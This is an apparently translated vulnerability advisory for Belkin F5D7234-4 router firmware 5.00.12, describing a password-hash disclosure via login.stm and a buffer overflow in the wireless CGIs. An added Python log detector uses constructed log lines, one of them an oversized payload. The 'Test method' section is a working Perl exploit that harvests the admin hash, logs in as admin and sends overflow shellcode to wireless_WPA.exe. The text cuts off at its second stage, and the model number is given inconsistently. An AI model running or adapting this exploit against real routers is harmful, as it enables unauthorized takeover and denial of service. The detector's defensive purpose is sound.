4 G Wireless Router Authentication Bypass and Remote Code Execution Vulnerabilities

Release date: 2013-08-26
Updated: 2013-08-28

Affected systems:
Belkin F5D8236-4
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 61994

The Belkin F5D7234-4 G is a wireless router product.

The Belkin F5D7234-4 G Wireless Router, firmware version 5.00.12, contains an authentication bypass vulnerability and a remote code execution vulnerability. An attacker who exploits them can obtain the device's administrator login password, cause a denial of service, or perform unauthorized operations. The authentication bypass stems from a flaw in the handler for $ip/login.stm, which can leak the administrator login password hash. The remote code execution vulnerability stems from a flaw in the handler for $ip/cgi-bin/wireless_WPS_Enroll.exe, which can lead to a buffer overflow.

<*Source: Aodrulez
 
  Link:
*>
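From a defender's side, the two flaws above leave a recognizable trace in any HTTP log taken in front of the device (a transparent proxy, an IDS HTTP log, or a gateway): a fetch of /login.stm closely followed by a POST to /cgi-bin/login.exe from the same client, and a POST to one of the wireless configuration CGIs carrying a parameter longer than any valid WPA passphrase (at most 63 characters). The following detector is an added example written for this page, not code from the advisory or from Aodrulez. It assumes Common Log Format lines in which the POST parameters are visible as a query string (a real collector would log decoded body sizes instead), the 5-minute correlation window and the use of the 63-character limit for wireless_WPS_Enroll.exe are assumptions, and the log lines are constructed for the example.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Endpoints named on the advisory page.
HASH_LEAK_PATH = "/login.stm"
LOGIN_PATH = "/cgi-bin/login.exe"
OVERFLOW_PATHS = {"/cgi-bin/wireless_WPA.exe", "/cgi-bin/wireless_WPS_Enroll.exe"}

# A WPA-PSK passphrase is at most 63 characters, so a longer value sent to the
# wireless configuration CGIs is invalid input. Applying the same limit to
# wireless_WPS_Enroll.exe is an assumption of this example.
MAX_PARAM_LEN = 63
# Assumed correlation window for "fetch login.stm, then log in".
LOGIN_WINDOW = timedelta(minutes=5)

# Common Log Format: client ident user [timestamp] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)


def parse_line(line):
    """Parse one log line into a dict; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def detect(lines):
    """Return (rule, source_ip, timestamp) alerts for the exploitation pattern."""
    alerts = []
    last_hash_fetch = {}  # src -> time of the most recent request for /login.stm
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        src, ts, path = rec["src"], rec["ts"], rec["path"]
        # Rule 1: /login.stm (which discloses the admin password hash on the
        # affected firmware) followed shortly by a login from the same source.
        if path == HASH_LEAK_PATH:
            last_hash_fetch[src] = ts
        elif path == LOGIN_PATH and rec["method"] == "POST":
            seen = last_hash_fetch.get(src)
            if seen is not None and ts - seen <= LOGIN_WINDOW:
                alerts.append(("hash-disclosure-then-login", src, ts))
        # Rule 2: a parameter to the wireless CGIs longer than any valid passphrase.
        if path in OVERFLOW_PATHS:
            for name, values in rec["params"].items():
                if any(len(v) > MAX_PARAM_LEN for v in values):
                    alerts.append(("oversized-wireless-param:" + name, src, ts))
                    break
    return alerts


def _line(src, ts, method, target, status):
    """Build one constructed Common Log Format line."""
    return f'{src} - - [{ts}] "{method} {target} HTTP/1.1" {status} -'


# Constructed sample log: one client following the exploit's sequence, and one
# client performing a normal admin login without touching /login.stm first.
SAMPLE_LOG = [
    _line("10.0.0.7", "26/Aug/2013:10:02:11 +0000", "GET", "/login.stm", 200),
    _line("10.0.0.7", "26/Aug/2013:10:02:13 +0000", "POST", "/cgi-bin/login.exe", 200),
    _line("10.0.0.7", "26/Aug/2013:10:02:20 +0000", "POST",
          "/cgi-bin/wireless_WPA.exe?wpa_key_text=ssss&wpa_key_pass=" + "A" * 120, 200),
    _line("10.0.0.9", "26/Aug/2013:11:15:00 +0000", "GET", "/index.htm", 200),
    _line("10.0.0.9", "26/Aug/2013:11:15:30 +0000", "POST", "/cgi-bin/login.exe", 200),
    "this line is not in log format and is skipped",
]

if __name__ == "__main__":
    for rule, src, ts in detect(SAMPLE_LOG):
        print(f"{ts.isoformat()} {src} {rule}")
```

The second client's login on its own raises nothing, which is the point of correlating the login with a preceding /login.stm fetch: the hash disclosure is only interesting when it is used. Either alert is a reason to check the device's firmware version and, on the affected version, to restrict management access to trusted hosts.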

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and educational purposes only. Use at your own risk!

#!/usr/bin/perl

use strict;
use warnings;
use LWP 5.64;
$| = 1;

# Variable declarations.
my $browser = LWP::UserAgent->new;
my $passHash="";
my $url ="";
my $response ="";
my $ip="";
$browser ->timeout(10);


# Just a few nops followed by a dummy shellcode that crashes & reboots the router.
my $shellcode="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20";

sub Authenticate()
{
  print "[+] Trying to authenticate.\n";
  $url= "http://$ip/login.stm";
  $response = $browser->get( $url);
  my @aod= $response->content =~ m/var password = "(.*)";/g;
  if(!$aod[0])
  {
    print "[-] Damn! Something went wrong. This might not work here :-/\n";
    exit;
  }
  else
  {
    $passHash=$aod[0];
    print "[+] Admin Password = $passHash (MD5 Hash).\n";
  }

print "[+] Time to authenticate you!\n";
$url = "http://$ip/cgi-bin/login.exe";
$response = $browser->post( $url,
    [ 'totalMSec' => "1377121454.99",
      'pws' => "$passHash",
    ,]
  );
 
  if( $response->content =~ /index/ )
  {
    print "[+] Logged in successfully as 'Admin'!\n";
    print "[!] Open this link in a browser for admin access : $ip/setup.htm \n";
  } else {
    print "[-] Login failed! This might not work here :-/\n";
    exit;
  }

print "\n[+] Continue with exploitation? (Y/N) : ";
  my $temp=<STDIN>;
  if ($temp=~"Y" || $temp=~"y")
  {
    Exploit();
  }
  else
  {
    print "[+] Have fun!\n\n";
    exit;
  }
}


sub Exploit()
{
# Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
# 0x803c0278 is fixed for this device/firmware combination.
  print "[+] Stage 1 : Allocating shellcode.\n";

if (length($shellcode) > 120)
  {
  print "[-] Shellcode is too big! (120 bytes Max)\n";
  exit;
  }
  print "[+] Shellcode length : ".length($shellcode)."\n";

# Fill the rest with nops. Not needed but good to have.
  # Shellcode size should be ideally a multiple of 4 as this is MIPS.
  my $nopsize=120-length($shellcode);
  $shellcode=$shellcode.("\x20"x$nopsize);

$url = "http://$ip/cgi-bin/wireless_WPA.exe";
$response = $browser->post( $url,
    [ 'wpa_authen' => "1",
      'wpa_psk' => '0',
      's_rekeysec' => '900000',
      's_rekeypkt' => '1000',
      'w802_rekey' => '0',
      'encryption' => '3',
      'security_type' => '4',
      'authentication' => '3',
      'encryption_hid' => '3',
      'wpa_key_text' => "ssss",
      'wpa_key_pass' => "$shellcode",
      'obscure_psk' => '1',
      'sharedkey_alter' => '',
      'sharedkey_alter1' => '1',
     
    ,]
  );
 
  if( !$response->content )
  {
    print "[-] Damn! Something went wrong. This might not work here :-/\n";
  }
  else
  { 
    print "[+] Stage 1 seems to have gone well.\n";
  }

# Stage 2: Trigger Stack Overflow & overwrite RA
print "[+] Stage 2 : Triggering Return Address overwrite.\n";
